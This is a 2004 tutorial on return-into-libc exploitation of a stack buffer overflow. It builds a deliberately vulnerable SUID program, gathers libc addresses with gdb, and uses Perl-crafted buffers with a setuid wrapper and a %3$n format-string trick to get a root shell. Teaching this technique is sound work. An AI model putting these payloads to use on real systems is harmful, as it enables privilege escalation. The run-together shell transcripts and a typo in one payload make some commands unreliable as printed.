Exploitation - Returning into libc by Shaun Colley on 11/03/04

Introduction

Generic vulnerabilities in applications such as the infamous "buffer overflow vulnerability" crop up reguarly in many immensely popular software packages thought to be secure by most, and programmers continue to make the same mistakes as a result of lazy or sloppy coding practices. As programmers wisen up to the common techniques employed by hackers when exploiting buffer overflow vulnerabilities, the likelihood of having the ability to execute arbitrary shellcode on the program stack decreases. One such example of why is the fact that some Operating Systems are beginning to use non-exec stacks by default, which makes executing shellcode on the stack when exploiting a vulnerable application is a significantly more challenging task. Another possibility is that many IDSs automatically detect simple shellcodes, making injecting shellcode more of a task. As with most scenarios, with a problem comes a solution. With a little knowledge of the libc functions and their operation, one can take an alternate approach to executing arbitrary code as a result of exploitation of a buffer overflow vulnerability or another bug: returning to libc.

The intention of this article is not to teach you the in's and out's of buffer overflows, but to explain in a little detail another technique used to execute arbitrary code as opposed to the classic 'NOP sled + shellcode + repeated retaddr' method. I assume readers are familiar with buffer overflow vulnerabilities and the basics of how to exploit them. Also a little bit of the theory of memory organisation is desirable, such as how the little-endian bit ordering system works. To those who are not familiar with buffer overflow bugs, I suggest you read "Smashing the Stack for Fun and Profit".

http://www.phrack.org/phrack/49/P49-14

Returning into libc

As the name suggests, the entire concept of the technique is that instead of overwriting the EIP register with the predicted or approxamate address of your NOP sled in memory or your shellcode, you overwrite EIP with the address of a function contained within the libc library, with any function arguments following. An example of such would be to exploit a buffer overflow bug to overwrite EIP with the address of system() or execl() included in the libc library to run an interactive shell (/bin/sh for example). This idea is quite reasonable, and since it does not involve estimating return addresses and building large exploit buffers, this is quite an appealing technique, but it does have it's downsides which I shall explain later.

Let me demonstrate an example of the technique. Let's say we have the following small example program, vulnprog:

--START
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {

if(argc < 2) {
printf("Usage: %s <string>\n", argv[0]);
exit(-1);
}

char buf[5];

strcpy(buf, argv[1]);
return(0);
}

gcc vulnprog.c -o vulnprog
chown root vulnprog
chmod +s vulnprog

--END

Anyone with a tiny bit of knowledge of buffer overflows can see that the preceding program is ridiculously insecure, and allows anybody who exceeds the bounds of buf' to overwrite data on the stack. It would usually be quite easy to write an exploit for the above example program, but let's assume that our friendly administrator has just read a computer security book and has enabled a non-executable stack as a security measure. This requires us to think a little out of the box in order to be able to execute arbitrary code, but we already have our solution; return into a libc function.

How, you may ask, do we actually get the information we need and prepare an 'exploit buffer' in order to execute a libc function as a result of a buffer overflow? Well, all we need is the address of the desired libc function, and the address of any function arguments. So let's say for example we wanted to exploit the above program (it is SUID root) to execute a shell (we want /bin/sh) using system() - all we'd need is the address of system() and then the address holding the string "/bin/sh" right? Correct. "But how do we begin to get this info?". That is what we're about to find out.

--START
[shaunige@localhost shaunige]$echo "int main() { system(); }" > test.c [shaunige@localhost shaunige]$ cat test.c
int main() { system(); }
[shaunige@localhost shaunige]$gcc test.c -o test [shaunige@localhost shaunige]$ gdb -q test
(gdb) break main
Breakpoint 1 at 0x8048342
(gdb) run
Starting program: /home/shaunige/test

Breakpoint 1, 0x08048342 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x4005f310 <system> (gdb) quit The program is running. Exit anyway? (y or n) y [shaunige@localhost shaunige]$
--END

First, I create a tiny dummy program which calls the libc function 'system()' without any arguments, and compiled it. Next, I ran gdb ready to debug our dummy program, and I told gdb to report breakpoints before running the dummy program. By examining the report, we get the location of the libc function system() in memory - and it shall remain there until libc is recompiled. So, now we have the address of system(), which puts us half way there. However, we still need to know how we can store the string "/bin/sh" in memory and ultimately reference it whenever needed. Let's think about this for a moment. Maybe we could use an environmental variable to hold the string? Yes, infact, an environmental variable would be ideal for this task, so let's create and use an environment variable called $HACK to store our string ("/bin/sh"). But how are we going to know the memory address of our environment variable and ultimately our string? We can write a simple utility program to grab the memory address of the environmental variable. Consider the following code: --START #include <stdio.h> #include <stdlib.h> int main(int argc, char *argv[]) { if(argc < 2) { printf("Usage: %s <environ_var>\n", argv[0]); exit(-1); } char *addr_ptr; addr_ptr = getenv(argv[1]); if(addr_ptr == NULL) { printf("Environmental variable %s does not exist!\n", argv[1]); exit(-1); } printf("%s is stored at address %p\n", argv[1], addr_ptr); return(0); } --END This program will give us the address of a given environment variable, let's test it out: --START [shaunige@localhost shaunige]$ gcc getenv.c -o getenv
[shaunige@localhost shaunige]$./getenv TEST Environmental variable TEST does not exist! [shaunige@localhost shaunige]$ ./getenv HOME
HOME is stored at address 0xbffffee2
[shaunige@localhost shaunige]$--END Great, it seems to work. Now, let's get down to actually creating our variable with the desired string "/bin/sh" and get the address of it. First I create the environmental variable, and then I run our above program to get the memory location of a desired environment variable: --START [shaunige@localhost shaunige]$ export HACK="/bin/sh"
[shaunige@localhost shaunige]$echo$HACK
/bin/sh
[shaunige@localhost shaunige]$./getenv HACK HACK is stored at address 0xbffff9d8 [shaunige@localhost shaunige]$
--END

This is good, we now have all of the information we need to exploit the vulnerable program: the address of 'system()' (0x4005f310) and the address of the environmental variable $HACK holding our string "/bin/sh" (0xbffff9d8). So, what do we do with this stuff? Well, like in all instances of exploiting a buffer overflow hole, we craft an exploit buffer, but ours is somewhat different to one you may be used to seeing, with repeated NOPs (known as a 'NOP sled'), shellcode and repeated return addresses. Ours exploit buffer needs to look something like this: --START ----------------------------------------------------------------------------- | system() addr | return address | system() argument | ----------------------------------------------------------------------------- --END "But wait, I thought you said we don't need a return address?". We don't, but libc functions always require a return address to JuMP to after the function has finished it's job, but we don't care if the program segmentation faults after running the shell, so we don't even need a return address. Instead, we'll just specify 4 bytes of garbage data, "HACK" for example. So, with this in mind, a representation of our whole buffer needs to look like this: --START ---------------------------------------------------------------------- | DATA-TO-OVERFLOW-BUFFER | 0x4005f310 | HACK | 0xbffff9d8 | ---------------------------------------------------------------------- --END The data represented by 'DATA-TO-OVERFLOW-BUFFER' is just garbage data used to overflow beyond the bounds ("boundaries") of the buff' variable enough to position the address of libc 'system()' function (0x4005f310) into the EIP register. It looks now like we have all of the information and theory of concept we need: build a buffer containing the address of a libc function, followed by a return address to JuMP to after executing the function, followed by any function arguments for the libc function. The buffer will need garbage data at the beginning so as to overflow far enough into memory to overwrite the EIP register with the address of system() so that it jumps to it instead of the next instruction in the program (the same technique used when using shellcode: inject an arbitrary memory address into EIP). Now that we have all of the necessary theory of this technique and the required information for actually implementing it (i.e address of a libc function and memory address of string "/bin/sh" etc), let's exploit this bitch! Exploitation We have the necessary stuff, so let's get on with the ultimate goal: to get a root shell by executing 'system("/bin/sh")' rather than shellcode! Let's assume that we are exploiting a Linux system with a non-executable stack, so we have no other option than to 'return into libc'. Remembering back to the diagram representation of our exploit buffer, we should recall that garbage data must precede the buffer so that we are writing into EIP, followed by the memory location of 'system()', then followed by a return address which we do not need, followed by the memory address of "/bin/sh". Let's see if we can exploit vulnprog.c this way. If you think back, we have already set and exported the environmental variable$HACK, but let's do it again and grab the memory address, just for clarity's sake.

--START
[shaunige@localhost shaunige]$export HACK="/bin/sh" [shaunige@localhost shaunige]$ echo $HACK /bin/sh [shaunige@localhost shaunige]$ ./getenv HACK
HACK is stored at address 0xbffff9d8
[shaunige@localhost shaunige]$--END Good, we now have the address of our string. You should also remember that we created a dummy program which called 'system()' from which we got our address of system() with the help of GDB. The address was 0x4005f310. We've got the stuff, let's write that exploit! We'll do it with Perl from the console, because it gives us more flexibility and more room for testing than writing a larger program in C does. First, we must reverse the addresses of 'system'() and the environment variable holding "/bin/sh" due to the fact that we are working on a system using the little-endian byte ordering system. This gives us: 'system()' address: #################### \x10\xf3\x05\x40$HACK's address:
#################

\xd8\xf9\xff\xbf

And we know that for the return address required by all libc functions just needs to be a 4-byte value. We'll just use "HACK". Therefore, our exploit buffer looks like this so far:

\x10\xf3\x05\x40HACK\xd8\xf9\xff\xbf

But something is missing. In it's current state, if fed to vulnprog, the address of 'system()' would NOT overwrite into EIP like we want, because we wouldn't have overflowed the 'buf' variable enough to reach the location of the EIP register. So, as shown on our above diagram of our exploit buffer, we're going to need to prepend garbage data onto the beginning of our exploit buffer to overwrite far enough into the stack region to reach EIP so that we can overwrite that return address. How can we know how much garbage data we need, as it needs to be spot on? The only reasonable way is just trial-n-error. Due to playing with vulnprog a little, I found that we will probably need about 6-9 words of garbage data.

--START

[shaunige@localhost shaun]$./vulnprog perl -e 'print "BLEH"x6 . "\x10\xf3\x05\x40HACK\xd8\xf9\xff\xbf"' Segmentation fault [shaunige@localhost shaun]$ ./vulnprog perl -e 'print
"BLEH"x9 .
"\x10\xf3\x05\x40HACK\xd8\xf9\xff\xbf"'
Segmentation fault

[shaunige@localhost shaun]$./vulnprog perl -e 'print "BLEH"x8 . "\x10\xf3\x05\x40HACK\xd8\xf9\xff\xbf"' Segmentation fault [shaunige@localhost shaun]$ ./vulnprog perl -e 'print
"BLEH"x7 .
"\x10\xf3\x05\x40HACK\xd8\xf9\xff\xbf"'
sh-2.05b$whoami shaunige sh-2.05b$ exit
exit
[shaunige@localhost shaun]$--END The exploit worked, and it needed 7 words of dummy data. But wait, why don't we have a rootshell? vulnprog'' is SUID root, so what's going on? 'system()' runs the specified path (in our case "/bin/sh") through /bin/sh itself, so the privileges were dropped, thus giving us a shell, but not a rootshell. Therefore, the exploit *did* work, but we're going to have to use a libc function that *doesn't* drop privileges before executing the path specified ("/bin/sh" in our scenario). Using a 'wrapper' Hmm, what to do? We're going to have to use one of the exec() functions, as they do not use /bin/sh, thus not dropping privileges. First, let's make our job a little easier, and create a little program that will run a shell for us (called a wrapper program). --START /* expl_wrapper.c */ #include <stdio.h> #include <stdlib.h> int main() { setuid(0); setgid(0); system("/bin/sh"); } --END We need a plan: instead of using 'system()' to run a shell, we'll overwrite the return address on stack (EIP register) with the address of 'execl()' function in the libc library. We'll tell 'execl()' to execute our wrapper program (expl_wrpper.c), which raises our privs and executes a shell. Voila, a root shell. However, this is not going to be as easy as the last experiment. For a start, the execl() function needs NULLs as the last function argument, but 'strcpy()' in vulnprog.c will think that a NULL (\x00 in hex representation) means the end of the string, thus making the exploit fail. Instead, we can use 'printf()' to write NULLs without NULL's appearing in the exploit buffer. Our exploit buffer needs to this time look like this: --START ------------------------------------------------------------------------------- GARBAGE|printf() addr|execl() addr| %3$n addr|wrapper
here
|-------------------------------------------------------------------------
------

--END

You may notice "%3$n addr". This is a format string for 'printf()', and due to direct parameter access, it will skip over the two "wrapper addr" addresses, and place NULLs at the end of the exploit buffer. This time, the address of 'printf()' is overwritten into EIP, executing 'printf()' first, followed by the execution of our wrapper program. This will result in a rootshell since vulnprog is SUID root. 'addr of here' needs to be the address of itself, which will be overwritten by NULLs when 'printf()' skips over the first 2 parameters of the 'execl' call. To get the addresses of 'printf()' and 'execl()' libc library functions, we'll again write a tiny test program, and use GDB to help us out. --START /* test.c */ #include <stdio.h> int main() { execl(); printf(0); } [shaunige@localhost shaunige]$ gcc test.c -o test -g
[shaunige@localhost shaunige]$gdb -q ./test (gdb) break main Breakpoint 1 at 0x804837c: file test.c, line 4. (gdb) run Starting program: /home/shaunige/test Breakpoint 1, main () at test.c:4 4 execl(); (gdb) p execl$1 = {<text variable, no debug info>} 0x400bde80
<execl>
(gdb) p printf
$2 = {<text variable, no debug info>} 0x4006e310 <printf> (gdb) quit The program is running. Exit anyway? (y or n) y [shaunige@localhost shaunige]$
--END

Excellent, just as we wanted, we have now the addresses of libc 'execl()' and 'printf()'. We'll be using 'printf()' to write NULLs (with the format string "%3$n"), so we'll need to write the printf() format string %3$n into memory. Using the format string %3$n to write NULLs works because it uses direct positional parameters (hence the '$' in the format string) - %3 tells it to skip over the first two function arguments of 'execl()' (address of our wrapper program followed by the address of the wrapper program again), and writes NULLs into the location after the second argument of the execl function. Let's use an environment variable again, due to past success with them. We'll use also an environment variable to store the path of our wrapper program which invokes a shell, "/home/shaunige/wrapper".

--START
[shaunige@localhost shaunige]$export NULLSTR="%3\$n"
[shaunige@localhost shaunige]$echo$NULLSTR
%3$n [shaunige@localhost shaunige]$ export
WRAPPER_PROG="/home/shaunige/wrapper"
[shaunige@localhost shaunige]$echo$WRAPPER_PROG
/home/shaunige/wrapper
[shaunige@localhost shaunige]$./getenv NULLSTR NULLSTR is stored at address 0xbfffff5f [shaunige@localhost shaunige]$ ./getenv WRAPPER_PROG
WRAPPER_PROG is stored at address 0xbffff9a9
[shaunige@localhost shaunige]$--END We now have all of the addresses which we need, except the last argument: 'addr of here'. This needs to be the address of the buffer when it is copied over. It needs to be the memory address of the overflowable 'buf' variable + 48 bytes. But how will we get the address of 'buf'? All we need to do is add an extra line of code to vulnprog.c, recompile it, and we will have the address in memory of 'buf': --START [shaunige@localhost shaunige]$ cat vulnprog.c
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {
if(argc < 2) {
printf("Usage: %s <string>\n", argv[0]);
exit(-1);
}

char buf[5];

printf("addr of buf is: %p\n", buf);

strcpy(buf, argv[1]);
return(0);
}

[shaunige@localhost shaunige]$gcc vulnprog.c -o vulnprog [shaunige@localhost pcalc-000]$ ../vulnprog perl -e
'print
"1234"x13'
Segmentation fault
[shaunige@localhost pcalc-000]$--END --END With a little simple hexadecimal addition, we can determine that 0xbffff780 + 48 = 0xbffff7b0. This is the address which is the final function argument of 'execl()', where the NULLs will be located. We now have all of the information we need, so exploitation will be easy. Again, I'm going to craft the exploit buffer from the console with perl, let's get going! --START [shaunige@localhost shaunige]$ ./vulnprog perl -e
'print "1234"x7 .
"\x10\xe3\x06\x40" . "\x80\xde\x0b\x40" .
"\x5f\xff\xff\xbf" . "\xa9\xf9\xff\bf"
. "\xa9\xf9\xff\xbf" . "\xb0\xf7\xff\xbf"'`

sh-2.05b#

--END

Well, well, looks like our little exploit worked! Depending on your machine's stack, you may need more garbage data (used for spacing) preceding your exploit buffer, but it worked fine for us.

The exploit buffer was fed to 'vulnprog' thus overwriting the return address on stack with the address of the libc 'printf()' function. 'printf()' then wrote NULLs into the correct place, and exited. Then 'execl()' executed our wrapper program as instructed, which was designed to invoke a shell (/bin/sh) with privileges of 'vulnprog' (root), leaving us with a lovely rootshell. Voila.

Conclusion

I have hopefully given you a quick insight on an alternative to executing arbitrary code during the exploitation of a stack-based overflow vulnerability in a given program. Non-executable stacks are becoming more and more common in modern Operating Systems, and knowing how to 'return into libc' rather than using shellcode can be a very useful thing to know. I hope you've enjoyed this article, I appreciate feedback.

References